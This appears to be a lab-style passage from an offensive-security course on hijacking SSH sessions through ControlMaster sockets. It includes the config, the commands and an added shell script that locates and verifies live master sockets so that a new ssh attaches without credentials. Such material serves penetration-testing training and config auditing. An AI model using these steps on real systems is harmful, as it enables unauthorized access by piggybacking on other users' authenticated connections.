Hijacking with ControlMaster

Create the ~/.ssh/config file with the following contents:

    Host *
        ControlPath ~/.ssh/controlmaster/%r@%h:%p
        ControlMaster auto
        ControlPersist 10m

ssh refuses to read a config file that is writable by group or others, so set its permissions, then create the directory the control sockets will live in:

    chmod 644 ~/.ssh/config
    mkdir ~/.ssh/controlmaster

Once the legitimate "Victim Session" has connected to linuxvictim, its master connection leaves a Unix socket in that directory, named after the remote user, host and port exactly as the ControlPath template (%r@%h:%p) dictates:

    ls -al ~/.ssh/controlmaster/

    srw------- 1 offsec offsec 0 May 13 13:55 offsec@linuxvictim:22

The socket is mode 0600 and owned by offsec, so any process running as offsec (or as root) can connect to it. With ControlMaster set to auto, a new ssh invocation to the same user, host and port finds that socket and attaches to the existing master instead of authenticating:

    ssh offsec@linuxvictim

We're now logged in on the linuxvictim machine without having been asked for a password or a key: the new session was multiplexed over the victim's already-authenticated master connection, effectively "piggybacking" an active legitimate connection to the same machine. Note that ControlPersist 10m keeps that master (and its socket) alive for ten minutes after the victim's last session closes, so the window for reuse is wider than the time the victim is actually logged in.
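The following script is an added example, not part of the course page: it shows how an operator who has landed in the offsec user's environment would confirm the conditions above before trying the hijack. It reads the ssh_config for the multiplexing directives, expands the ControlPath template into the socket path that a session to a given user, host and port would use, converts the ControlPersist value into a reuse window in seconds, and asks ssh itself (the real `-O check` option) whether a master is alive. The function names (ctl_*, find_control_sockets, audit_target) and the hypothetical sample config are this example's own.

```shell
#!/bin/sh
# Added example, not from the course page: audit a host's ssh_config for
# reusable ControlMaster sockets and locate any that are already open.

# Expand the ControlPath tokens that matter for socket naming: %r remote user,
# %h remote host, %p remote port, %u local user, and a leading ~/ for $HOME.
# Other tokens (for example the hashed %C form) are left untouched.
ctl_socket_path() {
    template=$1 ruser=$2 rhost=$3 rport=$4
    luser=$(id -un)
    path=$(printf '%s\n' "$template" |
        sed -e "s|%r|$ruser|g" -e "s|%h|$rhost|g" -e "s|%p|$rport|g" -e "s|%u|$luser|g")
    case $path in
        '~/'*) path="$HOME/${path#"~/"}" ;;
    esac
    printf '%s\n' "$path"
}

# Convert a ControlPersist value to seconds: no -> 0, yes -> -1 (master kept
# indefinitely), otherwise ssh's time format (plain seconds, or NN followed by
# s/m/h/d/w). Compound values such as 1h30m are not handled here.
ctl_persist_seconds() {
    v=$(printf '%s' "$1" | tr 'A-Z' 'a-z')
    case $v in
        no)  printf '%s\n' 0;  return 0 ;;
        yes) printf '%s\n' -1; return 0 ;;
    esac
    n=${v%[smhdw]}
    unit=${v#"$n"}
    case $n in
        ''|*[!0-9]*) printf 'unparseable ControlPersist value: %s\n' "$1" >&2; return 1 ;;
    esac
    case $unit in
        ''|s) mult=1 ;; m) mult=60 ;; h) mult=3600 ;; d) mult=86400 ;; w) mult=604800 ;;
    esac
    printf '%s\n' $((n * mult))
}

# Print the multiplexing directives found in an ssh_config, one per line.
ssh_control_settings() {
    awk 'tolower($1) ~ /^(controlmaster|controlpath|controlpersist)$/ { print $1, $2 }' "$1"
}

# Succeed if the config turns on a master that new sessions attach to without
# a prompt (auto or yes). ask/autoask require an ssh-askpass confirmation per
# attach and so are not counted. The first value wins, as in ssh; Host-block
# matching is not evaluated.
ctl_master_enabled() {
    awk 'tolower($1) == "controlmaster" && v == "" { v = tolower($2) }
         END { if (v == "auto" || v == "yes") exit 0; exit 1 }' "$1"
}

# List control sockets under a directory. ssh creates them mode 0600, owned by
# the user who opened the master, so anyone running as that user, or as root,
# can reuse them.
find_control_sockets() {
    find "$1" -type s 2>/dev/null
}

# Ask the multiplexer whether a master is alive for user@host:port (ssh -O check).
# Exit 0 means a master is running and `ssh -p port user@host` would attach
# to it without authenticating.
ctl_master_alive() {
    ssh -p "$3" -O check "$1@$2" 2>/dev/null
}

# Tie it together for one target, e.g.: audit_target offsec linuxvictim 22
audit_target() {
    ruser=$1 rhost=$2 rport=${3:-22} cfg=${4:-$HOME/.ssh/config}
    [ -r "$cfg" ] || { printf 'no readable ssh_config at %s\n' "$cfg"; return 1; }
    if ! ctl_master_enabled "$cfg"; then
        printf 'ControlMaster not enabled in %s\n' "$cfg"; return 1
    fi
    tmpl=$(awk 'tolower($1) == "controlpath" { print $2; exit }' "$cfg")
    [ -n "$tmpl" ] || { printf 'ControlMaster set but no ControlPath; nothing to reuse\n'; return 1; }
    sock=$(ctl_socket_path "$tmpl" "$ruser" "$rhost" "$rport")
    persist=$(awk 'tolower($1) == "controlpersist" { print $2; exit }' "$cfg")
    printf 'expected socket: %s (ControlPersist %s s)\n' \
        "$sock" "$(ctl_persist_seconds "${persist:-no}")"
    if [ -S "$sock" ] && ctl_master_alive "$ruser" "$rhost" "$rport"; then
        printf 'live master found: ssh %s@%s will attach without credentials\n' "$ruser" "$rhost"
    else
        printf 'no live master for %s@%s\n' "$ruser" "$rhost"
        return 1
    fi
}
```

Source the file in the compromised offsec shell and run `audit_target offsec linuxvictim 22`; when the "Victim Session" is up it reports the socket path and confirms a live master, after which a plain `ssh offsec@linuxvictim` attaches. When the config is unreadable or uses a ControlPath outside ~/.ssh, `find_control_sockets /tmp` and `find_control_sockets ~/.ssh` locate candidate sockets directly. Read the other way round, the same checks tell a defender which accounts have ControlMaster auto with a long ControlPersist and therefore leave reusable sessions behind.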

Now that we've demonstrated the first scenario, we'll close the attacker's SSH session as the offsec user while leaving the "Victim Session" open.
